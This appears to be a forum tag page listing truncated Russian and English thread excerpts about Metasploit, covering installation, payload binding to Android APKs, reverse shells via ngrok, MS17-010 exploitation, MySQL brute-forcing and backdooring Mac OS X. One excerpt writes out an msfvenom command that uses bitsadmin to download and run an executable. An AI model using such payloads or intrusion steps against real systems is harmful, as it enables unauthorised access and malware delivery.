metasploit

  1. P

    Статья Списки слов для атаки по словарю: пароли, имена пользователей, каталоги

    Далеко не всё программное обеспечение содержит эксплуатируемые уязвимости (как этого хотелось бы некоторым). Но цепь, как известно, рвётся на самом слабом звене. И нам не важно, насколько сильны остальные звенья, если мы найдём слабое. Очень часто слабым звеном является человек. Именно поэтому...
  2. P

    Статья Как запустить Metasploit Framework в Kali Linux

    Для запуска Metasploit Framework в Kali 2.0 смотрите здесь. Чтобы соответствовать Политике Сетевых Служб (Network Services Policy) Kali Linux, при загрузке отсутствуют сетевые службы, включая службы базы данных, поэтому нужно сделать пару шагов чтобы запустить Metasploit с поддержкой базы...
  3. P

    Статья Metasploit Exploitation Framework и searchsploit — как искать и как использовать эксплойты

    Metasploit Exploitation Framework — это инструмент для тестирования на проникновение. Он содержит большую базу эксплойтов, позволяет использовать их прямо из Metasploit. Существует две версии Metasploit, в этом уроке я рассматриваю бесплатную версию. searchsploit — это инструмент для поиска...
  4. Freeze Gamer

    Проблема Склейка Metasploit payload с apk

    Доброго времени суток всем! На днях поставил Metasploit в Termux. При попытке добавить payload в уже существующий apk Metasploit пожаловался на отсутствие Zipalign. Нашёл много разных версий, но под aarch64 не было не одной. Буду благодарен за помощь в решении данного вопроса.
  5. F

    Проблема Как использовать команду "write"

    Я недавно стал пользоваться termux и metasploit в целом. Мне интересно, что делает команда "write" и как её использовать?
  6. N

    Проблема Metasploit: как передать кириллицу на атакуемый хост

    Всем привет! Эксплуатирую уязвимость MS17-010 на Windows XP SP3 RU через метасплоит, модуль Command Execution, остальные завершаются с ошибкой. Создал нового пользователя, активировал на целевом хосте РДП, но не могу добавить пользователя в группу "Администраторы". Путём проб понял, что...
  7. Rook

    Проблема MSF mysql login

    Всем добрейшего дня. Столкнулся с проблемкой,нашел сервер mysql,версия 5.5.6.2,после попыток Брута через модуль mysql_login после 100-150 попыток,на время банится айпиха. Пробовал вручную на кали включать прокси,но так же банится почему то моя айпиха,а не та которая через прокси. В данном модуле...
  8. Default

    Статья Создание бэкдора в операционной системе Mac OS X при помощи терминала и Kali Linux

    Привет. В последние время от всех друзей слышу, что Mac OS X - самая безопасная система. Но почему? Основной аргумент - у данной ОС закрытая файловая система, в то время как у Windows она открыта. Это значит, что можно просмотреть все системные файлы или отредактировать их. Злоумышленники...
  9. timmy

    Soft Kage - графический метасплоит.

    Приветствую читателей codeby.net! Сегодня хотелось бы обратить внимание на один интересный проект, созданный для облегчения пользования Metasploit, а именно сеансами meterpreter и не только. И так, "Kage" - инструмент, представляющий собой графический интерфейс пользователя для "Metasploit...
  10. NARNO

    Проблема Metasploit + NGRok kali linux

    Всем привет! Нужна помощь с разбором проблемы в комбинации metasploit с ngrok в kali linux. Сессия meterpreter не саздаёться, пробовал разные способы, искал решение в интернете но не нашёл. Можете написать как правильно создать ссесию meterpreter через openweb.
  11. M

    Проблема Добавить exploit в metasploit

    Здравствуйте, хотел бы узнать, как добавить exploit в metasploit. Пытался добавить через /root/.mfs4/modules/exploit/remote но не видит. Как например данный эксплотит добавить в metasploit ? На форуме ничего не нашел
  12. M

    Проблема msfconsole > sh: 0: getcwd() failed: No such file or directory

    Здравствуйте. Столкнулся впервые с такой проблемой sh: 0: getcwd() failed: No such file or directory sh: 0: getcwd() failed: No such file or directory [!] There was an error parsing `Gemfile`: No such file or directory - getcwd. Bundler cannot continue. # from...
  13. v1ri0us

    Статья Установка Metasploit-Framework на Android-устройство [NO ROOT]

    Привет, сегодня я расскажу про установку Metasploit-Framework на твое Android-устройство. На сегодняшний день, Metasploit является одним из лучших инструментов пентеста. В нем собранно несколько тысяч эксплоитов и не только. С его помощью даже можно создать свой новый инструмент. И так к делу...
  14. The Codeby

    Статья Metasploit - взлом чужого компа

    В предыдущей статье из серии профессиональных инструментов для взлома, мы загрузили и установили Metasploit. Теперь, мы начнем адаптироваться к Metasploit Framework и будем делать маленькие шаги чтобы инициировать наш первый настоящий взлом. Прежде чем мы начнем взлом, давайте ознакомимся с...
  15. F

    Проблема Android бесступенчатый reverse tcp

    Всем привет, я уже не первую неделю борюсь с проблемой обфускации смали кода reverse tcp и именно бесступенчатого реверса. В Evil-Droid есть вариант создания бесступенчатого реверса и его обфускации, но по каким то причинам это не работает (подозреваю что из за обновления метасплоита), так вот...
  16. K

    Article RDP Crack Windows 2017

    Hello everyone. I decided to share with you a new way of Windows rdp crack, exactly Windows Server 2003 SP1, SP2 and Windows XP SP0, SP1, SP3 At first we need to download the exploit and install it in Metasploit and create a separate dir for it in metasploit catalog. (all commands execute only...
  17. Lisenok

    Верная команда для windows/64/exec

    Всем доброго времени, при генерирование нагрузки в msfvenom , пэйлоадом windows/x64/exec с параметрами cmd="bitsadmin /transfer myjob /download /priority high https://mylink.com c:\myfile.exe&start myfile.exe" -f exe -o file.exe, при запуске на windows 10 x64, на доли секунды открывается окошко...
  18. n3d.b0y

    Статья [Metasploit] устанавливаем обратное TCP соединение через ngrok

    Привет codeby.net! Сегодня я вам покажу как можно получить обратное подключение без прокидывание портов и лишнего геморроя. Для реализации обратного подключения нам понадобиться metasploit и ngrok. Metasploit - проект, посвящённый информационной безопасности. Создан для предоставления...
  19. FlowLight

    Ищу друзей на Дальнем Востоке (Хабаровск,Владивосток)

    Всем привет! Имею огромное желание найти друзей в сфере ИБ и пентеста. Я верю что нужно оружать себя правильными друзьями с такими же целями и мечтами как у тебя . Если ты с ДВ - отзовись :)
  20. M

    Проблема auxiliary(scanner/http/crawler)

    Приветствую всех форумчан! Есть вопрос по поводу метасплоита, а именно. Использую модуль auxiliary(scanner/http/crawler) Как только сайт на https - отказывается сканить. Все установки указываю как положено, порт и SSL. Http работает отлично. В чем может быть проблема?